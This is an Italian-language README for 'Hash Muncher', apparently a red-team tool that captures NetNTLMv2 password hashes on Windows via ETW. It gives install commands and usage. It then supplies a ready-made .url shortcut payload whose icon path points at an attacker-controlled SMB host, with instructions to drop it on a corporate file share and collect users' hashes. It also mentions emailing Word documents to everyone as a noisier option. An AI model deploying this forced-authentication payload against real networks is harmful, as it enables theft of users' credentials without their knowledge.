
Cattura gli hash NetNTLMv2 utilizzando ETW con diritti amministrativi su Windows 8.1 / Windows Server 2016 e versioni successive
Cattura hash NetNTLMv2 usando ETW con diritti amministrativi su Windows
Tre diverse opzioni per installarlo e metterlo in funzione
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
Assicurati che Windows Firewall consenta "Condivisione file e stampanti" poiché Hash Muncher richiede che il servizio SMB integrato invii e riceva la richiesta iniziale e invii i pacchetti di risposta al target.
In un prompt elevato esegui Hash Muncher
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
Sostituisci l'indirizzo IP con la tua macchina Hash Muncher e salva il file su una condivisione file (aziendale) come 'whatever.url', e guarda gli hash arrivare a raffica.
Ci sono altri metodi menzionati in Red Team Notes - Forced Authentication, e probabilmente puoi ottenere successo anche inviando a tutti un documento Word via email, ma non è affatto stealth.
Ho giocato con ETW saltuariamente, ma quando ho visto la fantastica ricerca di Nettitude Labs ho capito che dovevo trasformarla in uno strumento facile da usare nel mio linguaggio preferito, Golang! Nettitude Labs ha un POC funzionante scritto in C# che gira sotto il framework .Net, e potrebbe essere un'opzione migliore per te. Quindi non sto davvero inventando nulla qui, sto solo aggiungendo questa alternativa.
Se ti piace la sicurezza su Windows, potresti apprezzare anche il mio strumento per grafi di attacco Adalanche